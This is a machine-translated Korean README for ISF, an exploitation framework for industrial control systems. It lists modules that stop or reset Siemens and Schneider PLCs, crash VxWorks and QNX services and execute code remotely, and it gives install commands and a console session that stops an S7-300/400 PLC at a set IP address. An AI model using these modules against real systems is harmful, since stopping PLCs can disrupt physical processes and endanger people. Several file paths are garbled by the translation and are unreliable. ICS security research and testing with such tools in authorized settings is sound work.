isf
ve release
ISF(Industrial Exploitation Framework)는 Python 기반의 익스플로잇 프레임워크로, 메타스플로잇 프레임워크와 유사합니다.
ISF는 오픈 소스 프로젝트인 Routersploit을 기반으로 합니다.
다른 언어로 읽어 보세요: 영어, 简体中文,
사전 상호 동의 없이 대상을 공격하기 위해 ISF를 사용하는 것은 불법입니다. 모든 해당 지역, 주 및 연방법을 준수하는 것은 최종 사용자의 책임입니다. 개발자는 이 프로그램으로 인해 발생하는 오용이나 피해에 대해 책임을 지지 않으며 책임을 지지 않습니다.
이름 | 길 | 설명 |
---|---|---|
modbus_tcp_client | icssploit/clients/modbus_tcp_client.py | Modbus-TCP 클라이언트 |
wdb2_client | icssploit/clients/wdb2_client.py | WdbRPC 버전 2 클라이언트(Vxworks 6.x) |
s7_클라이언트 | icssploit/clients/s7_client.py | s7comm 클라이언트(S7 300/400 PLC) |
이름 | 길 | 설명 |
---|---|---|
s7_300_400_plc_control | 익스플로잇/plcs/siemens/s7_300_400_plc_control.py | S7-300/400 PLC 시작/중지 |
s7_1200_plc_control | 익스플로잇/plcs/siemens/s7_1200_plc_control.py | S7-1200 PLC 시작/정지/리셋 |
vxworks_rpc_dos | 익스플로잇/plcs/vxworks/vxworks_rpc_dos.py | Vxworks RPC 원격 도스(CVE-2015-7599) |
Quantum_140_plc_control | 익스플로잇/plcs/schneider/퀀텀_140_plc_control.py | Schneider Quantum 140 시리즈 PLC 시작/중지 |
crash_qnx_inetd_tcp_service | 익스플로잇/plcs/qnx/crash_qnx_inetd_tcp_service.py | QNX Inetd TCP 서비스 dos |
qconn_remote_exec | 익스플로잇/plcs/qnx/qconn_remote_exec.py | QNX qconn 원격 코드 실행 |
profinet_set_ip | 익스플로잇/plcs/siemens/profinet_set_ip.py | Profinet DCP 장치 IP 구성 |
이름 | 길 | 설명 |
---|---|---|
profinet_dcp_scan | 스캐너/profinet_dcp_scan.py | Profinet DCP 스캐너 |
vxworks_6_scan | 스캐너/vxworks_6_scan.py | Vxworks 6.x 스캐너 |
s7comm_scan | 스캐너/s7comm_scan.py | S7comm 스캐너 |
enip_scan | 스캐너/enip_scan.py | 이더넷IP 스캐너 |
이러한 프로토콜은 Kitty와 같은 다른 Fuzzing 프레임워크에서 사용하거나 자체 클라이언트를 만들 수 있습니다.
이름 | 길 | 설명 |
---|---|---|
pn_dcp | icssploit/프로토콜/pn_dcp | Profinet DCP 프로토콜 |
모드버스_tcp | icssploit/프로토콜/modbus_tcp | 모드버스 TCP 프로토콜 |
wdbrpc2 | icssploit/프로토콜/wdbrpc2 | WDB RPC 버전 2 프로토콜 |
s7comm | icssploit/protocols/s7comm.py | S7comm 프로토콜 |
git clone https://github.com/dark-lbp/isf/
cd isf
python isf.py
root@kali:~/Desktop/temp/isf# python isf.py
_____ _____ _____ _____ _____ _ ____ _____ _______
|_ _/ ____|/ ____/ ____| __ | | / __ _ _|__ __|
| || | | (___| (___ | |__) | | | | | || | | |
| || | ___ \___ | ___/| | | | | || | | |
_| || |____ ____) |___) | | | |___| |__| || |_ | |
|__________|_____/_____/|_| |__________/_____| |_|
ICS Exploitation Framework
Note : ICSSPOLIT is fork from routersploit at
https://github.com/reverse-shell/routersploit
Dev Team : wenzhe zhu(dark-lbp)
Version : 0.1.0
Exploits: 2 Scanners: 0 Creds: 13
ICS Exploits:
PLC: 2 ICS Switch: 0
Software: 0
isf >
isf > use exploits/plcs/
exploits/plcs/siemens/ exploits/plcs/vxworks/
isf > use exploits/plcs/siemens/s7_300_400_plc_control
exploits/plcs/siemens/s7_300_400_plc_control
isf > use exploits/plcs/siemens/s7_300_400_plc_control
isf (S7-300/400 PLC Control) >
Tab 키를 사용하여 완료할 수 있습니다.
isf (S7-300/400 PLC Control) > show options
Target options:
Name Current settings Description
---- ---------------- -----------
target Target address e.g. 192.168.1.1
port 102 Target Port
Module options:
Name Current settings Description
---- ---------------- -----------
slot 2 CPU slot number.
command 1 Command 0:start plc, 1:stop plc.
isf (S7-300/400 PLC Control) >
isf (S7-300/400 PLC Control) > set target 192.168.70.210
[+] {'target': '192.168.70.210'}
isf (S7-300/400 PLC Control) > run
[*] Running module...
[+] Target is alive
[*] Sending packet to target
[*] Stop plc
isf (S7-300/400 PLC Control) >
isf (S7-300/400 PLC Control) > show info
Name:
S7-300/400 PLC Control
Description:
Use S7comm command to start/stop plc.
Devices:
- Siemens S7-300 and S7-400 programmable logic controllers (PLCs)
Authors:
- wenzhe zhu
References:
isf (S7-300/400 PLC Control) >